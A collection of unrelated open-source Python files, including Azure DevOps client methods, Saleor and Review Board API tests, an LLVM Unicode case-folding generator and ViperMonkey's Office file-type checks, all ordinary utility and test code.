def get_build_work_items_refs(self, project, build_id, top=None):
"""GetBuildWorkItemsRefs.
Gets the work items associated with a build.
:param str project: Project ID or project name
:param int build_id: The ID of the build.
:param int top: The maximum number of work items to return.
:rtype: [ResourceRef]
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
if build_id is not None:
route_values['buildId'] = self._serialize.url('build_id', build_id, 'int')
query_parameters = {}
if top is not None:
query_parameters['$top'] = self._serialize.query('top', top, 'int')
response = self._send(http_method='GET',
location_id='5a21f5d2-5642-47e4-a0bd-1356e6731bee',
version='5.1',
route_values=route_values,
query_parameters=query_parameters)
return self._deserialize('[ResourceRef]', self._unwrap_collection(response))
def get_build_work_items_refs_from_commits(self, commit_ids, project, build_id, top=None):
"""GetBuildWorkItemsRefsFromCommits.
Gets the work items associated with a build, filtered to specific commits.
:param [str] commit_ids: A comma-delimited list of commit IDs.
:param str project: Project ID or project name
:param int build_id: The ID of the build.
:param int top: The maximum number of work items to return, or the number of commits to consider if no commit IDs are specified.
:rtype: [ResourceRef]
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
if build_id is not None:
route_values['buildId'] = self._serialize.url('build_id', build_id, 'int')
query_parameters = {}
if top is not None:
query_parameters['$top'] = self._serialize.query('top', top, 'int')
content = self._serialize.body(commit_ids, '[str]')
response = self._send(http_method='POST',
location_id='5a21f5d2-5642-47e4-a0bd-1356e6731bee',
version='5.1',
route_values=route_values,
query_parameters=query_parameters,
content=content)
return self._deserialize('[ResourceRef]', self._unwrap_collection(response))
|
dojo/db_migrations/0147_rename_sslyze_parser.py | dant24/django-DefectDojo | 249 | 9949 | <filename>dojo/db_migrations/0147_rename_sslyze_parser.py
from django.db import migrations
def rename_sslyze_parser(apps, schema_editor):
Test_Type_model = apps.get_model('dojo', 'Test_Type')
try:
test_type_sslyze = Test_Type_model.objects.get(name='SSLyze 3 Scan (JSON)')
test_type_sslyze.name = 'SSLyze Scan (JSON)'
test_type_sslyze.save()
except Test_Type_model.DoesNotExist:
# This happens when a new instance of DD is initialized
pass
class Migration(migrations.Migration):
dependencies = [
('dojo', '0146_lead_optional'),
]
operations = [
migrations.RunPython(rename_sslyze_parser),
]
|
saleor/graphql/channel/tests/test_base_channel_listing.py | fairhopeweb/saleor | 15,337 | 10042 | from collections import defaultdict
import graphene
import pytest
from django.core.exceptions import ValidationError
from ....shipping.error_codes import ShippingErrorCode
from ..mutations import BaseChannelListingMutation
def test_validate_duplicated_channel_ids(channel_PLN, channel_USD):
# given
channel_id = graphene.Node.to_global_id("Channel", channel_USD.id)
second_channel_id = graphene.Node.to_global_id("Channel", channel_PLN.id)
errors = defaultdict(list)
# when
result = BaseChannelListingMutation.validate_duplicated_channel_ids(
[channel_id],
[second_channel_id],
errors,
ShippingErrorCode.DUPLICATED_INPUT_ITEM.value,
)
# then
assert result is None
assert errors["input"] == []
def test_validate_duplicated_channel_ids_with_duplicates(channel_PLN):
# given
channel_id = graphene.Node.to_global_id("Channel", channel_PLN.id)
second_channel_id = graphene.Node.to_global_id("Channel", channel_PLN.id)
error_code = ShippingErrorCode.DUPLICATED_INPUT_ITEM.value
errors = defaultdict(list)
# when
result = BaseChannelListingMutation.validate_duplicated_channel_ids(
[channel_id], [second_channel_id], errors, error_code
)
# then
assert result is None
assert errors["input"][0].code == error_code
def test_validate_duplicated_channel_values(channel_PLN, channel_USD):
# given
channel_id = graphene.Node.to_global_id("Channel", channel_PLN.id)
second_channel_id = graphene.Node.to_global_id("Channel", channel_USD.id)
error_code = ShippingErrorCode.DUPLICATED_INPUT_ITEM.value
errors = defaultdict(list)
field = "add_channels"
# when
result = BaseChannelListingMutation.validate_duplicated_channel_values(
[channel_id, second_channel_id], field, errors, error_code
)
# then
assert result is None
assert errors[field] == []
def test_validate_duplicated_channel_values_with_duplicates(channel_PLN):
# given
channel_id = graphene.Node.to_global_id("Channel", channel_PLN.id)
second_channel_id = graphene.Node.to_global_id("Channel", channel_PLN.id)
error_code = ShippingErrorCode.DUPLICATED_INPUT_ITEM.value
errors = defaultdict(list)
field = "add_channels"
# when
result = BaseChannelListingMutation.validate_duplicated_channel_values(
[channel_id, second_channel_id], field, errors, error_code
)
# then
assert result is None
assert errors[field][0].code == error_code
def test_clean_channels_add_channels(channel_PLN):
# given
channel_id = graphene.Node.to_global_id("Channel", channel_PLN.id)
error_code = ShippingErrorCode.DUPLICATED_INPUT_ITEM.value
errors = defaultdict(list)
# when
result = BaseChannelListingMutation.clean_channels(
None, {"add_channels": [{"channel_id": channel_id}]}, errors, error_code
)
# then
assert result == {
"add_channels": [{"channel_id": channel_id, "channel": channel_PLN}],
"remove_channels": [],
}
assert errors["input"] == []
def test_clean_channels_remove_channels(channel_PLN):
# given
channel_id = graphene.Node.to_global_id("Channel", channel_PLN.id)
error_code = ShippingErrorCode.DUPLICATED_INPUT_ITEM.value
errors = defaultdict(list)
# when
result = BaseChannelListingMutation.clean_channels(
None, {"remove_channels": [channel_id]}, errors, error_code
)
# then
assert result == {"add_channels": [], "remove_channels": [str(channel_PLN.id)]}
assert errors["input"] == []
def test_test_clean_channels_with_errors(channel_PLN):
# given
channel_id = graphene.Node.to_global_id("Channel", channel_PLN.id)
error_code = ShippingErrorCode.DUPLICATED_INPUT_ITEM.value
errors = defaultdict(list)
# when
result = BaseChannelListingMutation.clean_channels(
None, {"remove_channels": [channel_id, channel_id]}, errors, error_code
)
# then
assert result == {}
assert errors["remove_channels"][0].code == error_code
def test_test_clean_channels_invalid_object_type(channel_PLN):
# given
channel_id = graphene.Node.to_global_id("Product", channel_PLN.id)
error_code = ShippingErrorCode.GRAPHQL_ERROR.value
errors = defaultdict(list)
# when
with pytest.raises(ValidationError) as error:
BaseChannelListingMutation.clean_channels(
None, {"remove_channels": [channel_id]}, errors, error_code
)
# then
assert (
error.value.error_dict["remove_channels"][0].message
== f"Must receive Channel id: {channel_id}."
)
|
QUICK_START/NODE_SQUEEZESEG_CLUSTER/src/script/squeezeseg/utils/clock.py | Hqss/DINK | 189 | 10051 | <reponame>Hqss/DINK
#! /usr/bin/python2
# -*- coding: utf-8 -*-
"""
Clock function to take running time following Segmatch.
"""
# BSD 3-Clause License
#
# Copyright (c) 2019, FPAI
# Copyright (c) 2019, SeriouslyHAO
# Copyright (c) 2019, xcj2019
# Copyright (c) 2019, Leonfirst
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import datetime
class Clock(object):
def __init__(self):
self.kSecondsToMiliseconds = 1000.0
self.kMicrosecondsToMiliseconds = 0.001
self.start()
def start(self):
self.real_time_start_ = datetime.datetime.now()
def takeTime(self):
seconds = (datetime.datetime.now() - self.real_time_start_).seconds
useconds = (datetime.datetime.now() - self.real_time_start_).microseconds
self.real_time_ms_ = (seconds*self.kSecondsToMiliseconds + useconds*self.kMicrosecondsToMiliseconds) + 0.5
def getRealTime(self):
return self.real_time_ms_
def takeRealTime(self):
self.takeTime()
return self.getRealTime()
|
tests/periodicities/gen_makefile.py | jmabry/pyaf | 377 | 10077 | <reponame>jmabry/pyaf<filename>tests/periodicities/gen_makefile.py
import os
import glob
subdirs = glob.glob("tests/periodicities/*");
subdirs = ['tests/periodicities/Month',
'tests/periodicities/Minute',
'tests/periodicities/Week',
'tests/periodicities/Business_Hour',
'tests/periodicities/Business_Day',
'tests/periodicities/Second',
'tests/periodicities/Semi_Month',
'tests/periodicities/Hour',
'tests/periodicities/Day']
#print(subdirs)
print("PYTHON=python3\n\n");
lAllTarget = "";
for subdir1 in sorted(subdirs):
lBase = os.path.basename(subdir1);
test_target = "";
for filename in sorted(glob.glob(subdir1 + "/*.py")):
bn = os.path.basename(filename);
logfile = bn.replace("/" , "_");
logfile = "logs/periodicities_" + logfile.replace(".py" , ".log");
print("#PROCESSING FILE : " , filename, bn , logfile);
print(bn , " : " , "\n\t", "-$(PYTHON) " , filename , " > " , logfile , " 2>&1");
test_target = bn + " " + test_target;
lAllTarget = lAllTarget + " " + lBase;
print("\n\n", lBase , ": ", test_target, "\n" , "\n");
print("\n# ********************************************** \n");
print("all: " , lAllTarget , "\n\t\n");
|
examples/forest_fire/run.py | fire-suppression-abm/mesa | 1,704 | 10095 | <filename>examples/forest_fire/run.py
from forest_fire.server import server
server.launch()
|
llvm-7.0.0.src/utils/unicode-case-fold.py | sillywalk/grazz | 171 | 10099 | <filename>llvm-7.0.0.src/utils/unicode-case-fold.py<gh_stars>100-1000
#!/usr/bin/env python
"""
Unicode case folding database conversion utility
Parses the database and generates a C++ function which implements the case
folding algorithm. The database entries are of the form:
<code>; <status>; <mapping>; # <name>
<status> can be one of four characters:
C - Common mappings
S - mappings for Simple case folding
F - mappings for Full case folding
T - special case for Turkish I characters
Right now this generates a function which implements simple case folding (C+S
entries).
"""
import sys
import re
import urllib2
# This variable will body of the mappings function
body = ""
# Reads file line-by-line, extracts Common and Simple case fold mappings and
# returns a (from_char, to_char, from_name) tuple.
def mappings(f):
previous_from = -1
expr = re.compile(r'^(.*); [CS]; (.*); # (.*)')
for line in f:
m = expr.match(line)
if not m: continue
from_char = int(m.group(1), 16)
to_char = int(m.group(2), 16)
from_name = m.group(3)
if from_char <= previous_from:
raise Exception("Duplicate or unsorted characters in input")
yield from_char, to_char, from_name
previous_from = from_char
# Computes the shift (to_char - from_char) in a mapping.
def shift(mapping):
return mapping[1] - mapping[0]
# Computes the stride (from_char2 - from_char1) of two mappings.
def stride2(mapping1, mapping2):
return mapping2[0] - mapping1[0]
# Computes the stride of a list of mappings. The list should have at least two
# mappings. All mappings in the list are assumed to have the same stride.
def stride(block):
return stride2(block[0], block[1])
# b is a list of mappings. All the mappings are assumed to have the same
# shift and the stride between adjecant mappings (if any) is constant.
def dump_block(b):
global body
if len(b) == 1:
# Special case for handling blocks of length 1. We don't even need to
# emit the "if (C < X) return C" check below as all characters in this
# range will be caught by the "C < X" check emitted by the first
# non-trivial block.
body += " // {2}\n if (C == {0:#06x})\n return {1:#06x};\n".format(*b[0])
return
first = b[0][0]
last = first + stride(b) * (len(b)-1)
modulo = first % stride(b)
# All characters before this block map to themselves.
body += " if (C < {0:#06x})\n return C;\n".format(first)
body += " // {0} characters\n".format(len(b))
# Generic pattern: check upper bound (lower bound is checked by the "if"
# above) and modulo of C, return C+shift.
pattern = " if (C <= {0:#06x} && C % {1} == {2})\n return C + {3};\n"
if stride(b) == 2 and shift(b[0]) == 1 and modulo == 0:
# Special case:
# We can elide the modulo-check because the expression "C|1" will map
# the intervening characters to themselves.
pattern = " if (C <= {0:#06x})\n return C | 1;\n"
elif stride(b) == 1:
# Another special case: X % 1 is always zero, so don't emit the
# modulo-check.
pattern = " if (C <= {0:#06x})\n return C + {3};\n"
body += pattern.format(last, stride(b), modulo, shift(b[0]))
current_block = []
f = urllib2.urlopen(sys.argv[1])
for m in mappings(f):
if len(current_block) == 0:
current_block.append(m)
continue
if shift(current_block[0]) != shift(m):
# Incompatible shift, start a new block.
dump_block(current_block)
current_block = [m]
continue
if len(current_block) == 1 or stride(current_block) == stride2(current_block[-1], m):
current_block.append(m)
continue
# Incompatible stride, start a new block.
dump_block(current_block)
current_block = [m]
f.close()
dump_block(current_block)
print '//===---------- Support/UnicodeCaseFold.cpp -------------------------------===//'
print '//'
print '// This file was generated by utils/unicode-case-fold.py from the Unicode'
print '// case folding database at'
print '// ', sys.argv[1]
print '//'
print '// To regenerate this file, run:'
print '// utils/unicode-case-fold.py \\'
print '// "{}" \\'.format(sys.argv[1])
print '// > lib/Support/UnicodeCaseFold.cpp'
print '//'
print '//===----------------------------------------------------------------------===//'
print ''
print '#include "llvm/Support/Unicode.h"'
print ''
print "int llvm::sys::unicode::foldCharSimple(int C) {"
print body
print " return C;"
print "}"
|
reviewboard/webapi/tests/test_review_screenshot_comment.py | ParikhKadam/reviewboard | 921 | 10105 | <filename>reviewboard/webapi/tests/test_review_screenshot_comment.py<gh_stars>100-1000
from __future__ import unicode_literals
from django.contrib.auth.models import User
from djblets.webapi.errors import PERMISSION_DENIED
from reviewboard.reviews.models import ScreenshotComment
from reviewboard.webapi.resources import resources
from reviewboard.webapi.tests.base import BaseWebAPITestCase
from reviewboard.webapi.tests.mimetypes import (
screenshot_comment_item_mimetype,
screenshot_comment_list_mimetype)
from reviewboard.webapi.tests.mixins import (
BasicTestsMetaclass,
ReviewRequestChildItemMixin,
ReviewRequestChildListMixin)
from reviewboard.webapi.tests.mixins_comment import (
CommentItemMixin,
CommentListMixin)
from reviewboard.webapi.tests.urls import (
get_review_screenshot_comment_item_url,
get_review_screenshot_comment_list_url)
class BaseTestCase(BaseWebAPITestCase):
fixtures = ['test_users']
def _create_screenshot_review_with_issue(self, publish=False,
comment_text=None):
"""Sets up a review for a screenshot that includes an open issue.
If `publish` is True, the review is published. The review request is
always published.
Returns the response from posting the comment, the review object, and
the review request object.
"""
if not comment_text:
comment_text = 'Test screenshot comment with an opened issue'
review_request = self.create_review_request(publish=True,
submitter=self.user)
screenshot = self.create_screenshot(review_request)
review = self.create_review(review_request, user=self.user,
publish=publish)
comment = self.create_screenshot_comment(review, screenshot,
comment_text,
issue_opened=True)
return comment, review, review_request
class ResourceListTests(CommentListMixin, ReviewRequestChildListMixin,
BaseTestCase, metaclass=BasicTestsMetaclass):
"""Testing the ReviewScreenshotCommentResource list APIs."""
sample_api_url = 'review-requests/<id>/reviews/<id>/screenshot-comments/'
resource = resources.review_screenshot_comment
def setup_review_request_child_test(self, review_request):
self.create_screenshot(review_request)
review = self.create_review(review_request, user=self.user)
return (get_review_screenshot_comment_list_url(review),
screenshot_comment_list_mimetype)
def compare_item(self, item_rsp, comment):
self.assertEqual(item_rsp['id'], comment.pk)
self.assertEqual(item_rsp['text'], comment.text)
self.assertEqual(item_rsp['x'], comment.x)
self.assertEqual(item_rsp['y'], comment.y)
self.assertEqual(item_rsp['w'], comment.w)
self.assertEqual(item_rsp['h'], comment.h)
self.assertEqual(item_rsp['extra_data'], comment.extra_data)
if comment.rich_text:
self.assertEqual(item_rsp['text_type'], 'markdown')
else:
self.assertEqual(item_rsp['text_type'], 'plain')
#
# HTTP GET tests
#
def setup_basic_get_test(self, user, with_local_site, local_site_name,
populate_items):
review_request = self.create_review_request(
with_local_site=with_local_site,
submitter=user,
publish=True)
screenshot = self.create_screenshot(review_request)
review = self.create_review(review_request, user=user)
if populate_items:
items = [self.create_screenshot_comment(review, screenshot)]
else:
items = []
return (get_review_screenshot_comment_list_url(review,
local_site_name),
screenshot_comment_list_mimetype,
items)
#
# HTTP POST tests
#
def setup_basic_post_test(self, user, with_local_site, local_site_name,
post_valid_data):
review_request = self.create_review_request(
with_local_site=with_local_site,
submitter=user,
publish=True)
screenshot = self.create_screenshot(review_request)
review = self.create_review(review_request, user=user)
return (get_review_screenshot_comment_list_url(review,
local_site_name),
screenshot_comment_item_mimetype,
{
'screenshot_id': screenshot.pk,
'text': 'Test comment',
'x': 2,
'y': 2,
'w': 10,
'h': 10,
},
[review, screenshot])
def check_post_result(self, user, rsp, review, screenshot):
comment = \
ScreenshotComment.objects.get(pk=rsp['screenshot_comment']['id'])
self.compare_item(rsp['screenshot_comment'], comment)
def test_post_with_issue(self):
"""Testing the
POST review-requests/<id>/reviews/<id>/screenshot-comments/ API
with an issue
"""
comment_text = "Test screenshot comment with an opened issue"
comment, review, review_request = \
self._create_screenshot_review_with_issue(
publish=False, comment_text=comment_text)
rsp = self.api_get(
get_review_screenshot_comment_list_url(review),
expected_mimetype=screenshot_comment_list_mimetype)
self.assertEqual(rsp['stat'], 'ok')
self.assertIn('screenshot_comments', rsp)
self.assertEqual(len(rsp['screenshot_comments']), 1)
self.assertEqual(rsp['screenshot_comments'][0]['text'], comment_text)
self.assertTrue(rsp['screenshot_comments'][0]['issue_opened'])
class ResourceItemTests(CommentItemMixin, ReviewRequestChildItemMixin,
BaseTestCase, metaclass=BasicTestsMetaclass):
"""Testing the ReviewScreenshotCommentResource item APIs."""
fixtures = ['test_users']
sample_api_url = \
'review-requests/<id>/reviews/<id>/screenshot-comments/<id>/'
resource = resources.review_screenshot_comment
def compare_item(self, item_rsp, comment):
self.assertEqual(item_rsp['id'], comment.pk)
self.assertEqual(item_rsp['text'], comment.text)
self.assertEqual(item_rsp['x'], comment.x)
self.assertEqual(item_rsp['y'], comment.y)
self.assertEqual(item_rsp['w'], comment.w)
self.assertEqual(item_rsp['h'], comment.h)
self.assertEqual(item_rsp['extra_data'], comment.extra_data)
if comment.rich_text:
self.assertEqual(item_rsp['text_type'], 'markdown')
else:
self.assertEqual(item_rsp['text_type'], 'plain')
def setup_review_request_child_test(self, review_request):
screenshot = self.create_screenshot(review_request)
review = self.create_review(review_request, user=self.user)
comment = self.create_screenshot_comment(review, screenshot)
return (get_review_screenshot_comment_item_url(review, comment.pk),
screenshot_comment_item_mimetype)
#
# HTTP DELETE tests
#
def setup_basic_delete_test(self, user, with_local_site, local_site_name):
review_request = self.create_review_request(
with_local_site=with_local_site,
submitter=user,
publish=True)
screenshot = self.create_screenshot(review_request)
review = self.create_review(review_request, user=user)
comment = self.create_screenshot_comment(review, screenshot)
return (get_review_screenshot_comment_item_url(review, comment.pk,
local_site_name),
[comment, review])
def check_delete_result(self, user, comment, review):
self.assertNotIn(comment, review.screenshot_comments.all())
def test_delete_with_does_not_exist_error(self):
"""Testing the
DELETE review-requests/<id>/reviews/<id>/screenshot-comments/<id>/ API
with Does Not Exist error
"""
review_request = self.create_review_request(publish=True)
self.create_screenshot(review_request)
review = self.create_review(review_request, user=self.user)
self.api_delete(get_review_screenshot_comment_item_url(review, 123),
expected_status=404)
#
# HTTP GET tests
#
def setup_basic_get_test(self, user, with_local_site, local_site_name):
review_request = self.create_review_request(
with_local_site=with_local_site,
submitter=user,
publish=True)
screenshot = self.create_screenshot(review_request)
review = self.create_review(review_request, user=user)
comment = self.create_screenshot_comment(review, screenshot)
return (get_review_screenshot_comment_item_url(review, comment.pk,
local_site_name),
screenshot_comment_item_mimetype,
comment)
#
# HTTP PUT tests
#
def setup_basic_put_test(self, user, with_local_site, local_site_name,
put_valid_data):
review_request = self.create_review_request(
with_local_site=with_local_site,
submitter=user,
publish=True)
screenshot = self.create_screenshot(review_request)
review = self.create_review(review_request, user=user)
comment = self.create_screenshot_comment(review, screenshot)
return (get_review_screenshot_comment_item_url(review, comment.pk,
local_site_name),
screenshot_comment_item_mimetype,
{'text': 'Test comment'},
comment,
[])
def check_put_result(self, user, item_rsp, comment, *args):
comment = ScreenshotComment.objects.get(pk=comment.pk)
self.assertEqual(item_rsp['text_type'], 'plain')
self.assertEqual(item_rsp['text'], 'Test comment')
self.compare_item(item_rsp, comment)
def test_put_with_issue(self):
"""Testing the
PUT review-requests/<id>/reviews/<id>/screenshot-comments/<id>/ API
with an issue, removing issue_opened
"""
comment, review, review_request = \
self._create_screenshot_review_with_issue()
rsp = self.api_put(
get_review_screenshot_comment_item_url(review, comment.pk),
{'issue_opened': False},
expected_mimetype=screenshot_comment_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
self.assertFalse(rsp['screenshot_comment']['issue_opened'])
def test_put_issue_status_before_publish(self):
"""Testing the
PUT review-requests/<id>/reviews/<id>/screenshot-comments/<id> API
with an issue, before review is published
"""
comment, review, review_request = \
self._create_screenshot_review_with_issue()
# The issue_status should not be able to be changed while the review is
# unpublished.
rsp = self.api_put(
get_review_screenshot_comment_item_url(review, comment.pk),
{'issue_status': 'resolved'},
expected_mimetype=screenshot_comment_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
# The issue_status should still be "open"
self.assertEqual(rsp['screenshot_comment']['issue_status'], 'open')
def test_put_issue_status_after_publish(self):
"""Testing the
PUT review-requests/<id>/reviews/<id>/screenshot-comments/<id>/ API
with an issue, after review is published
"""
comment, review, review_request = \
self._create_screenshot_review_with_issue(publish=True)
rsp = self.api_put(
get_review_screenshot_comment_item_url(review, comment.pk),
{'issue_status': 'resolved'},
expected_mimetype=screenshot_comment_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
self.assertEqual(rsp['screenshot_comment']['issue_status'], 'resolved')
def test_put_issue_status_by_issue_creator(self):
"""Testing the
PUT review-requests/<id>/reviews/<id>/screenshot-comments/<id>/ API
permissions for issue creator
"""
comment, review, review_request = \
self._create_screenshot_review_with_issue(publish=True)
# Change the owner of the review request so that it's not owned by
# self.user
review_request.submitter = User.objects.get(username='doc')
review_request.save()
# The review/comment (and therefore issue) is still owned by self.user,
# so we should be able to change the issue status.
rsp = self.api_put(
get_review_screenshot_comment_item_url(review, comment.pk),
{'issue_status': 'dropped'},
expected_mimetype=screenshot_comment_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
self.assertEqual(rsp['screenshot_comment']['issue_status'], 'dropped')
def test_put_issue_status_by_uninvolved_user(self):
"""Testing the
PUT review-requests/<id>/reviews/<id>/screenshot-comments/<id>/ API
permissions for an uninvolved user
"""
comment, review, review_request = \
self._create_screenshot_review_with_issue(publish=True)
# Change the owner of the review request and review so that they're not
# owned by self.user.
new_owner = User.objects.get(username='doc')
review_request.submitter = new_owner
review_request.save()
review.user = new_owner
review.save()
rsp = self.api_put(
get_review_screenshot_comment_item_url(review, comment.pk),
{'issue_status': 'dropped'},
expected_status=403)
self.assertEqual(rsp['stat'], 'fail')
self.assertEqual(rsp['err']['code'], PERMISSION_DENIED.code)
def test_put_deleted_screenshot_comment_issue_status(self):
"""Testing the
PUT review-requests/<id>/reviews/<id>/screenshot-comments/<id>
API with an issue and a deleted screenshot
"""
comment_text = "Test screenshot comment with an opened issue"
x, y, w, h = (2, 2, 10, 10)
review_request = self.create_review_request(publish=True,
submitter=self.user,
target_people=[self.user])
screenshot = self.create_screenshot(review_request)
review = self.create_review(review_request, user=self.user)
comment = self.create_screenshot_comment(review, screenshot,
comment_text, x, y, w, h,
issue_opened=True)
# First, let's ensure that the user that has created the comment
# cannot alter the issue_status while the review is unpublished.
rsp = self.api_put(
get_review_screenshot_comment_item_url(review, comment.pk),
{'issue_status': 'resolved'},
expected_mimetype=screenshot_comment_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
# The issue_status should still be "open"
self.assertEqual(rsp['screenshot_comment']['issue_status'], 'open')
# Next, let's publish the review, and try altering the issue_status.
# This should be allowed, since the review request was made by the
# current user.
review.public = True
review.save()
rsp = self.api_put(
rsp['screenshot_comment']['links']['self']['href'],
{'issue_status': 'resolved'},
expected_mimetype=screenshot_comment_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
self.assertEqual(rsp['screenshot_comment']['issue_status'], 'resolved')
# Delete the screenshot.
self._delete_screenshot(review_request, screenshot)
review_request.publish(review_request.submitter)
# Try altering the issue_status. This should be allowed.
rsp = self.api_put(
rsp['screenshot_comment']['links']['self']['href'],
{'issue_status': 'open'},
expected_mimetype=screenshot_comment_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
self.assertEqual(rsp['screenshot_comment']['issue_status'], 'open')
|
examples/api/default_value.py | clamdad/atom | 222 | 10118 | <filename>examples/api/default_value.py
# --------------------------------------------------------------------------------------
# Copyright (c) 2013-2021, Nucleic Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
# --------------------------------------------------------------------------------------
""" Demonstrate all the ways to initialize a value
1. Pass the value directly
2. Assign the default value explicitly
3. Provide the value during initialization of the object
4. Provide factory callable that returns a value
5. Use a _default_* static method
"""
import sys
from atom.api import Atom, Int, Str
def get_mother():
return "Maude " + get_last_name()
def get_last_name():
"""Return a last name based on the system byteorder."""
return sys.byteorder.capitalize()
class Person(Atom):
"""A simple class representing a person object."""
first_name = Str("Bob")
age = Int(default=40)
address = Str()
mother = Str(factory=get_mother)
last_name = Str()
def _default_last_name(self):
return get_last_name()
if __name__ == "__main__":
bob = Person(address="101 Main")
print((bob.first_name, bob.last_name, bob.age))
print(bob.mother)
|
vipermonkey/core/filetype.py | lap1nou/ViperMonkey | 874 | 10124 | <reponame>lap1nou/ViperMonkey<filename>vipermonkey/core/filetype.py
"""
Check for Office file types
ViperMonkey is a specialized engine to parse, analyze and interpret Microsoft
VBA macros (Visual Basic for Applications), mainly for malware analysis.
Author: <NAME> - http://www.decalage.info
License: BSD, see source code or documentation
Project Repository:
https://github.com/decalage2/ViperMonkey
"""
# === LICENSE ==================================================================
# ViperMonkey is copyright (c) 2015-2016 <NAME> (http://www.decalage.info)
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Office magic numbers.
magic_nums = {
"office97" : "D0 CF 11 E0 A1 B1 1A E1", # Office 97
"office2007" : "50 4B 3 4", # Office 2007+ (PKZip)
}
# PE magic number.
pe_magic_num = "4D 5A"
def get_1st_8_bytes(fname, is_data):
info = None
is_data = (is_data or (len(fname) > 200))
if (not is_data):
try:
tmp = open(fname, 'rb')
tmp.close()
except:
is_data = True
if (not is_data):
with open(fname, 'rb') as f:
info = f.read(8)
else:
info = fname[:9]
curr_magic = ""
for b in info:
curr_magic += hex(ord(b)).replace("0x", "").upper() + " "
return curr_magic
def is_pe_file(fname, is_data):
"""
Check to see if the given file is a PE executable.
return - True if it is a PE file, False if not.
"""
# Read the 1st 8 bytes of the file.
curr_magic = get_1st_8_bytes(fname, is_data)
# See if we the known magic #.
return (curr_magic.startswith(pe_magic_num))
def is_office_file(fname, is_data):
"""
Check to see if the given file is a MS Office file format.
return - True if it is an Office file, False if not.
"""
# Read the 1st 8 bytes of the file.
curr_magic = get_1st_8_bytes(fname, is_data)
# See if we have 1 of the known magic #s.
for typ in magic_nums.keys():
magic = magic_nums[typ]
if (curr_magic.startswith(magic)):
return True
return False
def is_office97_file(fname, is_data):
# Read the 1st 8 bytes of the file.
curr_magic = get_1st_8_bytes(fname, is_data)
# See if we have the Office97 magic #.
return (curr_magic.startswith(magic_nums["office97"]))
def is_office2007_file(fname, is_data):
# Read the 1st 8 bytes of the file.
curr_magic = get_1st_8_bytes(fname, is_data)
# See if we have the Office 2007 magic #.
return (curr_magic.startswith(magic_nums["office2007"]))
|
packs/kubernetes/tests/test_third_party_resource.py | userlocalhost2000/st2contrib | 164 | 10125 | <gh_stars>100-1000
from st2tests.base import BaseSensorTestCase
from third_party_resource import ThirdPartyResource
class ThirdPartyResourceTestCase(BaseSensorTestCase):
sensor_cls = ThirdPartyResource
def test_k8s_object_to_st2_trigger_bad_object(self):
k8s_obj = {
'type': 'kanye',
'object': {
'kind': 'president',
'metadata': {
'name': 'west',
'namespace': 'westashians'
# uid missing
# label missing
}
}
}
sensor = self.get_sensor_instance()
self.assertRaises(KeyError, sensor._k8s_object_to_st2_trigger, k8s_obj)
def test_k8s_object_to_st2_trigger(self):
k8s_obj = {
'type': 'kanye',
'object': {
'kind': 'president',
'metadata': {
'name': 'west',
'namespace': 'westashians',
'uid': 'coinye',
'labels': ['rapper', 'train wrecker']
}
}
}
sensor = self.get_sensor_instance()
payload = sensor._k8s_object_to_st2_trigger(k8s_obj)
self.assertTrue('resource' in payload)
